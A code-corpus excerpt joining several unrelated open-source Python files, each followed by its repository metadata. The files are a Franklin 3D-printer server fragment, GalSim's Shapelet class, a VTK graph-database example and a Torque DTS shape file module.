new_machine.uuid = uuid
new_machine.finish(finish)
new_machine.call('reset_uuid', ['admin'], {}, prefinish)
else:
new_machine.finish(finish)
return False
def boot_machine_error():
log('error during machine detection on port %s.' % port)
websocketd.remove_timeout(timeout_handle[0])
machine.close()
ports[port] = None
broadcast(None, 'port_state', port, 0)
return False
machine.write(protocol.single['ID'])
timeout_handle = [websocketd.add_timeout(time.time() + .5, timeout)]
watcher = websocketd.add_read(machine, boot_machine_input, boot_machine_error)
def cancel():
websocketd.remove_timeout(timeout_handle[0])
websocketd.remove_read(watcher)
machine.close()
ports[port] = None
ports[port] = cancel
# Wait at least a second before sending anything, otherwise the bootloader thinks we might be trying to reprogram it.
handle = websocketd.add_timeout(time.time() + 1.5, part2)
def cancel():
websocketd.remove_timeout(handle)
ports[port] = None
ports[port] = cancel
# }}}
# Main loop. {{{
def _disconnect(socket, data):
del Connection.connections[socket.connection.id]
try:
httpd = Server(config['port'], Connection, disconnect_cb = _disconnect, httpdirs = fhs.read_data('html', dir = True, multiple = True), address = config['address'], log = config['log'], tls = tls)
udevsocket = fhs.write_runtime('udev.socket', packagename = 'franklin', opened = False)
os.makedirs(os.path.dirname(udevsocket), exist_ok = True)
if os.path.exists(udevsocket):
os.unlink(udevsocket)
udevserver = network.Server(udevsocket, Admin_Connection)
except OSError:
log('failed to start server: %s' % sys.exc_info()[1])
sys.exit(1)
# }}}
# Initialization. {{{
def create_machine(uuid = None): # {{{
if uuid is None:
uuid = protocol.new_uuid()
process = subprocess.Popen((fhs.read_data('driver.py', opened = False), '--uuid', uuid, '--allow-system', config['allow-system']) + (('--system',) if fhs.is_system else ()), stdin = subprocess.PIPE, stdout = subprocess.PIPE, close_fds = True)
machines[uuid] = Machine(None, process, None)
return uuid
# }}}
# Start known machine drivers.
for d in fhs.read_data('.', dir = True, opened = False, multiple = True):
for uuid in os.listdir(d):
if uuid in machines:
continue
if not os.path.isdir(os.path.join(d, uuid, 'profiles')):
continue
log('starting machine %s' % uuid)
create_machine(uuid = uuid)
# Detect serial ports. {{{
# Assume a GNU/Linux system; if you have something else, you need to come up with a way to iterate over all your serial ports and implement it here. Patches welcome, especially if they are platform-independent.
try:
# Try Linux sysfs.
for tty in os.listdir('/sys/class/tty'):
add_port('/dev/' + tty)
except:
# Try more generic approach. Don't use this by default, because it doesn't detect all ports on GNU/Linux.
try:
import serial.tools.list_ports
for tty in serial.tools.list_ports.comports():
add_port(tty[0])
except:
traceback.print_exc()
log('Not probing serial ports, because an error occurred: %s' % sys.exc_info()[1])
# }}}
# }}}
log('Franklin server is running')
websocketd.fgloop()
'''
ports is a dict with ports as keys and uuids as values, or None if no machine
is active on the port.
machines is a dict with uuids as keys and Machine objects as values.
As startup, all saved machines are loaded in the machines object, and all ports
are first found and inserted into the ports object, then machines are detected
on them. If found, the machine is enabled and the dicts are updated.
When a port is removed that has a machine attached, it is first disabled.
Machines can also be disabled manually, and detection on a port can be
requested manually as well.
'''
|
mtu-most/franklin
|
server/server.py
|
Python
|
agpl-3.0
| 38,340
|
[
"VisIt"
] |
5d082abb6a0bda7b0816e233a39ede88a8acf35d7e699abfbb51758ffe98a17b
|
# Copyright 2012, 2013 The GalSim developers:
# https://github.com/GalSim-developers
#
# This file is part of GalSim: The modular galaxy image simulation toolkit.
#
# GalSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GalSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalSim. If not, see <http://www.gnu.org/licenses/>
#
"""@file shapelet.py
Shapelet is a GSObject that implements a shapelet decomposition of a profile.
"""
import galsim
from galsim import GSObject
class Shapelet(GSObject):
"""A class describing polar shapelet surface brightness profiles.
This class describes an arbitrary profile in terms of a shapelet decomposition. A shapelet
decomposition is an eigenfunction decomposition of a 2-d function using the eigenfunctions
of the 2-d quantum harmonic oscillator. The functions are Laguerre polynomials multiplied
by a Gaussian. See Bernstein & Jarvis, 2002 or Massey & Refregier, 2005 for more detailed
information about this kind of decomposition. For this class, we follow the notation of
Bernstein & Jarvis.
The decomposition is described by an overall scale length, sigma, and a vector of
coefficients, b. The b vector is indexed by two values, which can be either (p,q) or (N,m).
In terms of the quantum solution of the 2-d harmonic oscillator, p and q are the number of
quanta with positive and negative angular momentum (respectively). Then, N=p+q, m=p-q.
The 2D image is given by (in polar coordinates):
I(r,theta) = 1/sigma^2 Sum_pq b_pq psi_pq(r/sigma, theta)
where psi_pq are the shapelet eigenfunctions, given by:
psi_pq(r,theta) = (-)^q/sqrt(pi) sqrt(q!/p!) r^m exp(i m theta) exp(-r^2/2) L_q^(m)(r^2)
and L_q^(m)(x) are generalized Laguerre polynomials.
The coeffients b_pq are in general complex. However, we require that the resulting
I(r,theta) be purely real, which implies that b_pq = b_qp* (where * means complex conjugate).
This further implies that b_pp (i.e. b_pq with p==q) is real.
Initialization
--------------
1. Make a blank Shapelet instance with all b_pq = 0.
shapelet = galsim.Shapelet(sigma=sigma, order=order)
2. Make a Shapelet instance using a given vector for the b_pq values.
order = 2
bvec = [ 1, 0, 0, 0.2, 0.3, -0.1 ]
shapelet = galsim.Shapelet(sigma=sigma, order=order, bvec=bvec)
We use the following order for the coeffiecients, where the subscripts are in terms of p,q.
[ b00 Re(b10) Im(b10) Re(b20) Im(b20) b11 Re(b30) Im(b30) Re(b21) Im(b21) ... ]
i.e. we progressively increase N, and for each value of N, we start with m=N and go down to
m=0 or 1 as appropriate. And since m=0 is intrinsically real, it only requires one spot
in the list.
@param sigma The scale size in the standard units (usually arcsec).
@param order Specify the order of the shapelet decomposition. This is the maximum
N=p+q included in the decomposition.
@param bvec The initial vector of coefficients. (Default: all zeros)
Methods
-------
The Shapelet is a GSObject, and inherits most of the GSObject methods (draw(), applyShear(),
etc.) and operator bindings. The exception is drawShoot, which is not yet implemented for
Shapelet instances.
In addition, Shapelet has the following methods:
getSigma() Get the sigma value.
getOrder() Get the order, the maximum N=p+q used by the decomposition.
getBVec() Get the vector of coefficients, returned as a numpy array.
getPQ(p,q) Get b_pq. Returned as tuple (re, im) (even if p==q).
getNM(N,m) Get b_Nm. Returned as tuple (re, im) (even if m=0).
setSigma(sigma) Set the sigma value.
setOrder(order) Set the order.
setBVec(bvec) Set the vector of coefficients.
setPQ(p,q,re,im=0) Set b_pq.
setNM(N,m,re,im=0) Set b_Nm.
fitImage(image) Fit for a shapelet decomposition of the given image.
"""
# Initialization parameters of the object, with type information
_req_params = { "sigma" : float, "order" : int }
_opt_params = {}
_single_params = []
_takes_rng = False
# --- Public Class methods ---
def __init__(self, sigma, order, bvec=None, gsparams=None):
# Make sure order and sigma are the right type:
order = int(order)
sigma = float(sigma)
# Make bvec if necessary
if bvec is None:
bvec = galsim.LVector(order)
else:
bvec_size = galsim.LVectorSize(order)
if len(bvec) != bvec_size:
raise ValueError("bvec is the wrong size for the provided order")
import numpy
bvec = galsim.LVector(order,numpy.array(bvec))
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec, gsparams))
def getSigma(self):
return self.SBProfile.getSigma()
def getOrder(self):
return self.SBProfile.getBVec().order
def getBVec(self):
return self.SBProfile.getBVec().array
def getPQ(self,p,q):
return self.SBProfile.getBVec().getPQ(p,q)
def getNM(self,N,m):
return self.SBProfile.getBVec().getPQ((N+m)/2,(N-m)/2)
# Note: Since SBProfiles are officially immutable, these create a new
# SBProfile object for this GSObject. This is of course inefficient, but not
# outrageously so, since the SBShapelet constructor is pretty minimalistic, and
# presumably anyone who cares about efficiency would not be using these functions.
# They would create the Shapelet with the right bvec from the start.
def setSigma(self,sigma):
bvec = self.SBProfile.getBVec()
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def setOrder(self,order):
curr_bvec = self.SBProfile.getBVec()
curr_order = curr_bvec.order
if curr_order == order: return
# Preserve the existing values as much as possible.
sigma = self.SBProfile.getSigma()
if curr_order > order:
bvec = galsim.LVector(order, curr_bvec.array[0:galsim.LVectorSize(order)])
else:
import numpy
a = numpy.zeros(galsim.LVectorSize(order))
a[0:len(curr_bvec.array)] = curr_bvec.array
bvec = galsim.LVector(order,a)
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def setBVec(self,bvec):
sigma = self.SBProfile.getSigma()
order = self.SBProfile.getBVec().order
bvec_size = galsim.LVectorSize(order)
if len(bvec) != bvec_size:
raise ValueError("bvec is the wrong size for the Shapelet order")
import numpy
bvec = galsim.LVector(order,numpy.array(bvec))
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def setPQ(self,p,q,re,im=0.):
sigma = self.SBProfile.getSigma()
bvec = self.SBProfile.getBVec().copy()
bvec.setPQ(p,q,re,im)
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def setNM(self,N,m,re,im=0.):
self.setPQ((N+m)/2,(N-m)/2,re,im)
def setFlux(self, flux):
# More efficient to change the bvector rather than add a transformation layer above
# the SBShapelet, which is what the normal setFlux method does.
self.scaleFlux(flux/self.getFlux())
def scaleFlux(self, fluxRatio):
# More efficient to change the bvector rather than add a transformation layer above
# the SBShapelet, which is what the normal setFlux method does.
sigma = self.SBProfile.getSigma()
bvec = self.SBProfile.getBVec() * fluxRatio
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def applyRotation(self, theta):
if not isinstance(theta, galsim.Angle):
raise TypeError("Input theta should be an Angle")
sigma = self.SBProfile.getSigma()
bvec = self.SBProfile.getBVec().copy()
bvec.rotate(theta)
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def applyDilation(self, scale):
sigma = self.SBProfile.getSigma() * scale
bvec = self.SBProfile.getBVec()
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def applyMagnification(self, mu):
import numpy
sigma = self.SBProfile.getSigma() * numpy.sqrt(mu)
bvec = self.SBProfile.getBVec() * mu
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
def fitImage(self, image, center=None, normalization='flux'):
"""Fit for a shapelet decomposition of a given image
The optional normalization parameter mirrors the parameter in the GSObject `draw` method.
If the fitted shapelet is drawn with the same normalization value as was used when it
was fit, then the resulting image should be an approximate match to the original image.
For example:
image = ...
shapelet = galsim.Shapelet(sigma, order)
shapelet.fitImage(image,normalization='sb')
shapelet.draw(image=image2, dx=image.scale, normalization='sb')
Then image2 and image should be as close to the same as possible for the given
sigma and order. Increasing the order can improve the fit, as can having sigma match
the natural scale size of the image. However, it should be noted that some images
are not well fit by a shapelet for any (reasonable) order.
@param image The Image for which to fit the shapelet decomposition
@param center The position in pixels to use for the center of the decomposition.
[Default: use the image center (`image.bounds.trueCenter()`)]
@param normalization The normalization to assume for the image.
(Default `normalization = "flux"`)
"""
if not center:
center = image.bounds.trueCenter()
# convert from PositionI if necessary
center = galsim.PositionD(center.x,center.y)
if not normalization.lower() in ("flux", "f", "surface brightness", "sb"):
raise ValueError(("Invalid normalization requested: '%s'. Expecting one of 'flux', "+
"'f', 'surface brightness' or 'sb'.") % normalization)
sigma = self.SBProfile.getSigma()
bvec = self.SBProfile.getBVec().copy()
galsim.ShapeletFitImage(sigma, bvec, image, center)
if normalization.lower() == "flux" or normalization.lower() == "f":
bvec /= image.scale**2
# SBShapelet, like all SBProfiles, is immutable, so we need to reinitialize with a
# new Shapelet object.
GSObject.__init__(self, galsim.SBShapelet(sigma, bvec))
|
mardom/GalSim
|
galsim/shapelet.py
|
Python
|
gpl-3.0
| 11,288
|
[
"Galaxy",
"Gaussian"
] |
4bb77074420b1a80b37e59036fd04f791df83cbd2a93a7e63aacff6b9a66ca58
|
from vtk import *
import os.path
data_dir = "../../../../VTKData/Data/Infovis/SQLite/"
if not os.path.exists(data_dir):
data_dir = "../../../../../VTKData/Data/Infovis/SQLite/"
sqlite_file = data_dir + "SmallEmailTest.db"
# Construct a graph from database tables (yes very tricky)
databaseToGraph = vtkSQLDatabaseGraphSource()
databaseToGraph.SetURL("sqlite://" + sqlite_file)
databaseToGraph.SetEdgeQuery("select source, target from emails")
databaseToGraph.SetVertexQuery("select Name, Job, Age from employee")
databaseToGraph.AddLinkVertex("source", "Name", False)
databaseToGraph.AddLinkVertex("target", "Name", False)
databaseToGraph.AddLinkEdge("source", "target")
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(databaseToGraph.GetOutputPort())
view.SetVertexLabelArrayName("label")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("Age")
view.SetColorVertices(True)
view.SetLayoutStrategyToSimple2D()
theme = vtkViewTheme.CreateMellowTheme()
theme.SetCellColor(.2,.2,.6)
theme.SetLineWidth(5)
theme.SetPointSize(10)
view.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view.GetInteractor().Start()
|
jeffbaumes/jeffbaumes-vtk
|
Examples/Infovis/Python/databases2.py
|
Python
|
bsd-3-clause
| 1,219
|
[
"VTK"
] |
81eb01794793a39d5d8a98b003e25afa9b151137bbc9a809c2b8102d33efd8c0
|
'''
Dts_Shape.py
Copyright (c) 2003 - 2006 James Urquhart(j_urquhart@btinternet.com)
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
import bpy
from .Torque_Util import *
from .Dts_Mesh import Primitive, Cluster, DtsMesh
from .Dts_Stream import *
###############################
# Torque Game Engine
# -------------------------------
# Dts Shape Class(es) for Python
###############################
# Node class - DTS tree node
class Node:
def __init__(self, na=0, pa=-1):
self.name = na # index of its name in the DTS string table
self.parent = pa # number of the parent node; -1 if root
self.firstObject = -1 # deprecated; set to -1
self.firstChild = -1 # deprecated; set to -1
self.nextSibling = -1 # deprecated; set to -1
# dObject class - DTS object
class dObject:
def __init__(self, na=0, nm=0, fm=0, no=-1):
self.name = na # index of its name in the DTS string table
self.numMeshes = nm # number of meshes (only one for detail level)
self.firstMesh = fm # number of the first mesh (meshes must be consecutive)
self.node = no # number of the node where the object is stored
self.sibling = -1 # deprecated; set to -1
self.firstDecal = -1 # deprecated; set to -1
def duplicate(self):
clone = dObject(self.name, self.numMeshes, self.firstMesh, self.node)
clone.sibling = self.sibling
clone.firstDecal = self.firstDecal
# dMaterial class - DTS material
class dMaterial:
# Material flags
SWrap = 0x00000001
TWrap = 0x00000002
Translucent = 0x00000004
Additive = 0x00000008
Subtractive = 0x00000010
SelfIlluminating = 0x00000020
NeverEnvMap = 0x00000040
NoMipMap = 0x00000080
MipMapZeroBorder = 0x00000100
IFLMaterial = 0x08000000
IFLFrame = 0x10000000
DetailMap = 0x20000000
BumpMap = 0x40000000
ReflectanceMap = 0x80000000
AuxiliaryMask = 0xF0000000
def __init__(self, na=0, fl=0, refl=-1, bum=-1, det=-1, dets=1.0, reflc=0):
self.name = na # texture name; materials don't use the DTS string table
self.flags = fl # material flags
self.reflectance = refl # index of reflectance map
self.bump = bum # index of bump map
self.detail = det # index of detail map
self.detailScale = dets # Scale of detail map
self.reflection = reflc # Amount of reflectance
# Decal Class
class Decal:
def __init__(self, na, nm, fm, ob=-1, sb=-1):
self.name = na
self.numMeshes = nm
self.firstMesh = fm
self.object = ob
self.sibling = sb
# MaterialList class
class MaterialList:
version = 1 # Version of the dts material list
def __init__(self):
self.materials = []
def __del__(self):
while len(self.materials) != 0:
del self.materials[0]
del self.materials
def materialExists(self, name):
for m in self.materials:
if m.name == name:
return True
return False
def findMaterial(self, name):
Torque_Util.dump_writeln("Find Material %d " % len(self.materials) + name)
for m in range(0, len(self.materials)):
Torque_Util.dump_writeln("Material %d " % m + self.materials[m].name )
if self.materials[m].name == name:
return m
return None
def get(self, no):
if no >= len(self.materials): return None
return self.materials[no]
def add(self, mt):
self.materials.append(mt)
return len(self.materials) - 1
def size(self):
return len(self.materials)
def printInfo(self):
Torque_Util.dump_writeln("Material List, Version %d" % self.version)
Torque_Util.dump_writeln("Contains : %d Materials" % len(self.materials))
for m in self.materials:
Torque_Util.dump_writeln("Material : %s" % m.name)
Torque_Util.dump_writeln("-Flags : %d" % m.flags)
Torque_Util.dump_writeln("-Reflectance : %d" % m.reflectance)
Torque_Util.dump_writeln("-Bump : %d" % m.bump)
Torque_Util.dump_writeln("-Detail : %d" % m.detail)
Torque_Util.dump_writeln("-detailScale : %f" % m.detailScale)
Torque_Util.dump_writeln("-reflection : %f" % m.reflection)
def read(self, fs):
ver = struct.unpack('<b', fs.read(calcsize('<b')))[0] # U8
if self.version == ver:
sz = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
# Read strings, adding a material for each one
for cnt in range(0, sz):
st = array('c')
# Read in string..
ss = struct.unpack('<b', fs.read(calcsize('<b')))[0] # U8
st.fromfile(fs, ss)
self.materials.append(dMaterial(st.tostring()))
# Read the rest of the Material properties (ref and ds is F32, rest is U32)
for mat in self.materials:
mat.flags = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
for mat in self.materials:
mat.reflectance = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
for mat in self.materials:
mat.bump = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
for mat in self.materials:
mat.detail = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
for mat in self.materials:
mat.detailScale = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
for mat in self.materials:
mat.reflection = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
else:
Torque_Util.dump_writeErr("Error! Version mismatch (%d, should be %d)" % (ver, self.version))
def write(self, fs):
fs.write(struct.pack('<b', self.version)) # Version
# name, flags, refl, bump, det, detsca, reflecion (in seperate arrays)
# Names
fs.write(struct.pack('<i', len(self.materials))) # S32
for mat in self.materials:
success = False
try:
mn = mat.name.decode("mbcs").encode("utf_8")
success = True
except:
pass
if not success:
try:
mn = mat.name.decode("idna").encode("utf_8")
success = True
except:
pass
if not success: mn = mat.name
fs.write(struct.pack('<b', len(mn))) # Length of Name
st = array('B')
st.fromstring(mn)
st.tofile(fs)
for mat in self.materials:
fs.write(struct.pack('I', mat.flags))
for mat in self.materials:
fs.write(struct.pack('i', mat.reflectance))
for mat in self.materials:
fs.write(struct.pack('i', mat.bump))
for mat in self.materials:
fs.write(struct.pack('i', mat.detail))
for mat in self.materials:
fs.write(struct.pack('f', mat.detailScale))
for mat in self.materials:
fs.write(struct.pack('f', mat.reflection))
# IFLMaterial class
class IflMaterial:
def __init__(self, na=0, sl=0, ff=0, ti=0, nf=0):
self.name = na # index of its name in the DTS string table
self.slot = sl # Slot of IFL Material
self.firstFrame = ff # First IFL Frame
self.time = ti # Time for sequence
self.numFrames = nf # Number of frames in material
# DetailLevel class
class DetailLevel:
def __init__(self, na=0, ss=0, od=0, sz=0.0, ae=-1, me=-1, pc=0):
self.name = na # index of the name in the DTS string table
self.subshape = ss # number of the subshape it belongs to
self.objectDetail = od # number of object mesh to draw for each object
self.size = sz # minimum pixel size (F32)
self.avgError = ae # Average error (alternate detail scheme)
self.maxError = me # Maximum error (alternate detail scheme)
self.polyCount = pc # Polygon count (of all meshes in detail level)
# Encodes billboard data
def encodeBillBoard(equator, polar, polarangle, dl, dim, includepoles):
val = 0
# dim is width + height
# 2, 2, 45, 0, 256, 0
# equator - Number of Equator Steps
# polar - Number of Polar Steps
# polarangle(radians) - Threshhold before showing the polar view on the billboard
# dl - Detail level to take picture of (typically 0)
# dim - image dimensions (max 128)
# includepoles - Take shots of top and bottom?
val |= (equator & 0x7F) # bits 0..6
val |= (val & 0x3F) << 7 # bits 7..12
# polarAngle max is 1.57079632679 0.785398163397
# polarAngle max in degrees is 45.0
# (int value unpacked is 32)
# Convert to radians
polarAngle = (float(polarangle) * 3.14159265358979323846) / 180.0
# Compress the value using some division
polarAngle = int(round(((polarAngle) / (1.0 / 64.0) / 3.14159265358979323846 / 0.5)))
if polarAngle > 32: polarAngle = 32 # cannot be higher than 32
val |= (polarAngle & 0x3F) << 13 # bits 13..18
val |= (dl & 0x0F) << 19 # 19..22
val |= (dim & 0xFF) << 23 # 23..30
if includepoles:
val |= 1 << 31 # true
else:
val |= 0 << 31 # false
return val
# Subshape class - DTS subshape
class SubShape:
def __init__(self, fn=0, fo=0, fd=0, nn=0, no=0, nd=0):
self.firstNode = fn # Index of first node in subshape
self.firstObject = fo # Index of first object in subshape
self.firstDecal = fd # Index of first decal in subshape
self.numNodes = nn # Number of nodes in subshape
self.numObjects = no # Number of objects in subshape
self.numDecals = nd # Number of decals in the subshape
self.firstTranslucent = 0 # N/A
# ObjectState class
class ObjectState:
def __init__(self, vs=1.0, fr=0, mf=0):
self.vis = vs # Alpha of object (0..1.0f)
self.frame = fr # Frame each mesh of the object should be on ([(vertsPerFrame*frame)..((vertsPerFrame*frame)+vertsPerFrame)])
self.matFrame = mf # IFL Material frame
# Trigger class (used for footsteps, etc)
class Trigger:
StateOn = 1 << 31
InvertOnReverse = 1 << 30
StateMask = 1 << (30) - 1
def __init__(self, st=0, on=True, ps=0.0, revert=False):
self.pos = ps
if (st <= 0) or (st > 32):
Torque_Util.dump_writeWarning("Warning : Invalid Trigger state (%d)" % st)
# st -= 1 # 0..31
# self.state = 1 << st
# this is just a plain integer, only bits 31 and 30 are used as flags.
self.state = st
if on: self.state |= self.StateOn
if revert: self.state |= self.InvertOnReverse
# The Morph Mesh Class
class Morph:
def __init__(self, na=0, initial=0.0):
self.nameIndex = na
self.initialValue = initial
# Get the highest number from an array (unsigned)
def highest(arr):
lasthighest = 0
for a in arr:
if a > lasthighest: lasthighest = a
return lasthighest
# Sequence class
class Sequence:
# flags
UniformScale = 0x0001
AlignedScale = 0x0002
ArbitraryScale = 0x0004
Blend = 0x0008
Cyclic = 0x0010
MakePath = 0x0020
IFLInit = 0x0040
HasTranslucency = 0x0080
def __init__(self, na=0, fl=0, nk=0, du=0.0, pri=0, fg=-1, ng=0, br=-1, bt=-1, bs=-1, bos=-1, bds=-1, ft=-1, nt=0,
tb=0, bm=0):
self.nameIndex = na # index of the name in the DTS string table
self.flags = fl # Flags of sequence
self.numKeyFrames = nk # Number of keyframes in sequence
self.duration = du # Duration of the sequence in seconds
self.priority = pri # Priority of sequence
self.firstGroundFrame = fg # Index of first ground frame
self.numGroundFrames = ng # Number of ground frames
self.baseRotation = br # Index of first rotation frame
self.baseTranslation = bt # Index of first translation frame
self.baseScale = bs # Index of first scale frame
self.baseObjectState = bos # Index of first object state
self.baseDecalState = bds # Index of first decal state
self.firstTrigger = ft # Index of first trigger
self.numTriggers = nt # Number of triggers
self.toolBegin = tb # ToolBegin
self.baseMorph = bm # Morph meshes
self.matters_rotation = [] # Boolean list of nodes used in sequence with rotation frames
self.matters_translation = [] # Boolean list of nodes used in sequence with translation frames
self.matters_scale = [] # Boolean list of nodes used in sequence with scale frames
self.matters_decal = [] # Boolean list of decals used in sequence
self.matters_ifl = [] # Boolean list of IFL materials used in sequence
self.matters_vis = [] # Boolean list of object states.visibility used in sequence
self.matters_frame = [] # Boolean list of object states.frame used in sequence
self.matters_matframe = [] # Boolean list of object states.matframe used in sequence
self.matters_morph = [] # Boolean list of morphs
def __del__(self):
del self.matters_rotation
del self.matters_translation
del self.matters_scale
del self.matters_decal
del self.matters_ifl
del self.matters_vis
del self.matters_frame
del self.matters_matframe
del self.matters_morph
def read(self, fs, version):
self.nameIndex = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.flags = struct.unpack('<I', fs.read(calcsize('<I')))[0] # U32
self.numKeyFrames = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.duration = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
self.priority = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.firstGroundFrame = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.numGroundFrames = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.baseRotation = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.baseTranslation = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.baseScale = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.baseObjectState = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.baseDecalState = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.firstTrigger = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.numTriggers = struct.unpack('<i', fs.read(calcsize('<i')))[0] # S32
self.toolBegin = struct.unpack('<f', fs.read(calcsize('<f')))[0] # F32
# if version > 24:
# self.baseMorph = struct.unpack('<i', fs.read(calcsize('<i')))[0] #S32
# Read integer sets
self.matters_rotation = readIntegerSet(fs)
self.matters_translation = readIntegerSet(fs)
self.matters_scale = readIntegerSet(fs)
self.matters_decal = readIntegerSet(fs)
self.matters_ifl = readIntegerSet(fs)
self.matters_vis = readIntegerSet(fs)
self.matters_frame = readIntegerSet(fs)
self.matters_matframe = readIntegerSet(fs)
# if version > 24:
# self.matters_morph = readIntegerSet(fs)
def write(self, fs, version, noIndex=False):
# Write Struct...
if noIndex == False: # Write Index
fs.write(struct.pack('<i', self.nameIndex))
fs.write(struct.pack('<I', self.flags))
fs.write(struct.pack('<i', self.numKeyFrames))
fs.write(struct.pack('<f', self.duration))
fs.write(struct.pack('<i', self.priority))
fs.write(struct.pack('<i', self.firstGroundFrame))
fs.write(struct.pack('<i', self.numGroundFrames))
fs.write(struct.pack('<i', self.baseRotation))
fs.write(struct.pack('<i', self.baseTranslation))
fs.write(struct.pack('<i', self.baseScale))
fs.write(struct.pack('<i', self.baseObjectState))
fs.write(struct.pack('<i', self.baseDecalState))
fs.write(struct.pack('<i', self.firstTrigger))
fs.write(struct.pack('<i', self.numTriggers))
fs.write(struct.pack('<f', self.toolBegin))
if version > 24:
fs.write(struct.pack('<i', self.baseMorph))
# Write integer sets
writeIntegerSet(fs, self.matters_rotation)
writeIntegerSet(fs, self.matters_translation)
writeIntegerSet(fs, self.matters_scale)
writeIntegerSet(fs, self.matters_decal)
writeIntegerSet(fs, self.matters_ifl)
writeIntegerSet(fs, self.matters_vis)
writeIntegerSet(fs, self.matters_frame)
writeIntegerSet(fs, self.matters_matframe)
if version > 24:
writeIntegerSet(fs, self.matters_morph)
# Resizes the matters array, removing 0's
def clearMatters(self, matter):
count = 0
# Count number of 0's
for m in matter:
if not m:
count += 1
del matter[:count]
# Make sure everything is 1
for m in range(0, len(matter)):
matter[m] = True
# Counts nodes used in sequence
def countNodes(self, countMode=-1):
global_count = 0
translation_count = 0
rotation_count = 0
scale_count = 0
# NOTE: assumes matters_rotation is the size of the shape's nodes and the other matters_*
for n in range(0, len(self.matters_rotation)):
if (countMode == 0) and self.matters_rotation[n]:
rotation_count += 1
elif (countMode == 1) and self.matters_translation[n]:
translation_count += 1
elif (countMode == 2) and self.matters_scale[n]:
scale_count += 1
elif self.matters_rotation[n] or self.matters_translation[n] or self.matters_scale[n]:
global_count += 1
if countMode == 0:
return rotation_count
elif countMode == 1:
return translation_count
elif countMode == 2:
return scale_count
else:
return global_count
# Returns indexes of nodes used in sequence
def getNodes(self, countMode=-1):
nodes = []
for n in range(0, len(self.matters_rotation)):
if self.matters_rotation[n]:
if not nodes.__contains__(n): nodes.append(n)
if countMode == 0:
return nodes
elif countMode != -1:
nodes = []
for n in range(0, len(self.matters_translation)):
if self.matters_translation[n]:
if not nodes.__contains__(n): nodes.append(n)
if countMode == 1:
return nodes
elif countMode != -1:
nodes = []
for n in range(0, len(self.matters_scale)):
if self.matters_scale[n]:
if not nodes.__contains__(n): nodes.append(n)
if countMode == 2: return nodes
return nodes
# The rather pointless DecalState class
class DecalState:
def __init__(self, fr=0):
self.frame = fr
# Main Shape Class
class DtsShape:
smNumSkipLoadDetails = False
def getNode(self, name):
for n in self.nodes:
if n.name == -1:
continue
if name == self.sTable.get(n.name):
return n
return None
def getNodeIndex(self, name):
for n in range(0, len(self.nodes)):
if self.nodes[n].name == -1:
continue
if name == self.sTable.get(self.nodes[n].name):
return n
return None
def getSequence(self, name):
for s in self.sequences:
if s.nameIndex == -1:
continue
if name == self.sTable.get(s.nameIndex):
return s
return None
def __init__(self):
self.bounds = Box() # Bounds of shape
self.center = Vector(0, 0, 0) # Center
self.tubeRadius = 0 # Shape tube radius (all meshes)
self.radius = 0.0 # Shape radius (all meshes)
self.meshes = [] # Meshes
self.morphs = [] # Morphs
self.morphDefSettings = [] # Morphs (default settings)
self.morphSettings = [] # Morphs (settings)
self.nodes = [] # Nodes (bones)
self.sequences = [] # Sequences
self.triggers = [] # Triggers
self.objects = [] # Objects
self.objectstates = [] # Object States
self.iflmaterials = [] # IFL Materials
self.subshapes = [] # Subshapes
self.detaillevels = [] # Detail Levels
self.decals = [] # Decals
self.decalstates = [] # Decal States
self.materials = MaterialList() # Material List
